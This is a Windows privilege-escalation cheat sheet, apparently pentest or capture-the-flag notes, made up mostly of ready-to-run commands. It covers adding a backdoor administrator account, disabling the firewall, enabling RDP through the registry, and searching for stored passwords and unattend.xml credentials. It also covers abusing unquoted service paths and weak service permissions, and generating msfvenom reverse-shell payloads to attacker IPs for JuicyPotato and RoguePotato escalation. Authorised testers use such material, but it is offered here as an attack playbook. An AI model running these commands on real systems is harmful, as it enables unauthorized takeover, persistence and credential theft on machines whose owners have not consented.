whoami
whoami /all
# shows all information about that user
hostname
echo %USERNAME%
$env:UserName
All users
What users are on the system? Any old user profiles that weren’t cleaned up? We list the other user accounts on the box and view our own user's information in a bit more detail.
net users
net user administrator
# Get information for particular user
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" # Windows XP and below
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Add User
Adding user that is part of the Administrator group
net user test test /add && net localgroup Administrators test /add
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Services
What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it?
tasklist /svc
tasklist /v
net start
sc query
# information about services and drivers can be obtained
sc start service_name
# To start service
sc stop service_name
# To stop running service
This one liner returns the process owner without admin rights, if something is blank under owner it’s probably running as SYSTEM, NETWORK SERVICE, or LOCAL SERVICE.
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
scheduled tasks
What scheduled tasks are there? Anything custom implemented?
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Networking
NICs
What NICs are connected? Are there multiple networks?
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Routes
What routes do we have?
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP
Anything in the ARP cache?
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
Connections
Are there connections to other hosts?
netstat -ano
Host File
C:\WINDOWS\System32\drivers\etc\hosts
Firewall
Is the firewall turned on? If so what’s configured?
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"
netsh firewall set opmode mode=disable
# To Disable firewall
Enable RDP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
dir /a
# list all files (even hidden files)
dir /s
# searches folders
dir /s *password*
# search the system for files containing 'password' in the filename
findstr /si password *.txt*
# search for specific keyword in txt file
Icacls
Are there any weak folder or file permissions? Full Permissions for Everyone or Users on Program Folders?
Some administrators will leave configurations files on the system with passwords in them.
The Unattend.xml file is an example of this.
It allows for the largely automated setup of Windows systems.
dir /s *pass* == *.config
# Recursively search for files in the current directory with “pass” in the name, or ending in “.config”
findstr /si password *.xml *.ini *.txt
# Recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt
Is XAMPP, Apache, or PHP installed? Any there any XAMPP, Apache, or PHP configuration files?
The Unquoted Service Paths vulnerability is a vulnerability that arises out of the way Windows interprets a file path for a service binary (executable). File paths that contain spaces, should be enclosed in double-quotes. If not, there’s a potential Unquoted Service Path vulnerability.
For example, the following path would be vulnerable:
C:\Program Files\something\winamp.exe
Not vulnerable
"C:\Program Files\something\winamp.exe"
We could place our payload with any of the following paths:
C:\winamp.exe (this is a reverse shell with the same names as legal program)
Required Things -
A service with an "unquoted" binary path containing one or more spaces in the path.
Write permission for any of the folder containing spaces.
A way to reboot the service or system in order to execute a payload.
Finding unquoted services
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
sc qc <service_name>
# verify with sc
once we transferred our payload to particular directory , we can restart the service to execute it
sc stop <service_name>
sc start <service_name>
AlwaysInstallElevated
AlwaysInstallElevated is a Windows setting that allows non-privileged users to install Microsoft Windows Installer Package Files (MSI) with elevated system permissions. This means that we can use this feature to execute a malicious MSI installer package with administrator permissions. To achieve this, two registry entries have to be set to the value 1 to be enabled.
Unattended Installs allow Windows to be deployed with little or no active involvement from an administrator. If administrators fail to clean up after such a process, an EXtensible Markup Language (XML) file called Unattend is left on the local system. This file contains all the configuration settings that were set during the installation process, some of which can involve the configuration of local accounts including Administrator accounts!
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
# Display the content of these files
Unattend credentials are stored in base64 and can be decoded manually with base64.
$PATH Interception
Requirements:
PATH contains a writeable folder with low privileges.
The writeable folder is before the folder that contains the legitimate binary.
List contents of the PATH environment variables
$env:Path
# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32
Service accounts can be given special privileges in order for them to run their services, and cannot be logged into directly.
Unfortunately, multiple problems have been found with service accounts, making them easier to escalate privileges with.
C:\Windows\Temp>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Windows\Temp>
"SeImpersonatePrivilege" is enabled so we can impersonate other users
If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato
If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato
Juicy Potato
Vulnerable Win versions
Windows 7 Enterprise
Windows 8.1 Enterprise
Windows 10 Enterprise
Windows 10 Professional
Windows Server 2008 R2 Enterprise
Windows Server 2012 Datacenter
Windows Server 2016 Standard
1. Createpaylaod
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.12.15 lport=4444 > shell.bat
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.3 LPORT=1337 -f exe > shell.exe
# If above payload failed to give stable connection
2. Transfer shell.bat and jp.exe to target box
3. Run JuicyPotato
./jp.exe -t * -p shell.bat -l 4444
-t: Create process call. For this option we’ll use * to test both options.
-p: The program to run. We’ll need to create a file that sends a reverse shell back to our attack machine.
-l: COM server listen port. This can be anything. We’ll use 4444.
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.
# Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
# RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
Insecure Service PermissionsEach service has an ACL which defines certain service-specific permissions.
Some permissions are innocuous (e.g. SERVICE_QUERY_CONFIG, SERVICE_QUERY_STATUS).
Some may be useful (e.g. SERVICE_STOP, SERVICE_START).
Some are dangerous (e.g. SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS)
If our user has permission to change the configuration of a service which runs with SYSTEM privileges, we can change the executable the service uses to one of our own.
Potential Rabit Hole: If you can change a service configuration but cannot stop/start the service, you may not be able to escalate privileges!
Identifying Service
.\accesschk.exe /accepteula -uwcqv user daclsvc
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul
# Obtain the permission string of all services
The following commands will print the affected services:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
Check the current configuration and status of the service
start listener on your kali and start the service on target box
net start <service>
Weak Registry Permissions
The Windows registry stores entries for each service. Since registry entries can have ACLs, if the ACL is misconfigured, it may be possible to modify a service’s configuration even if we cannot modify the service directly.
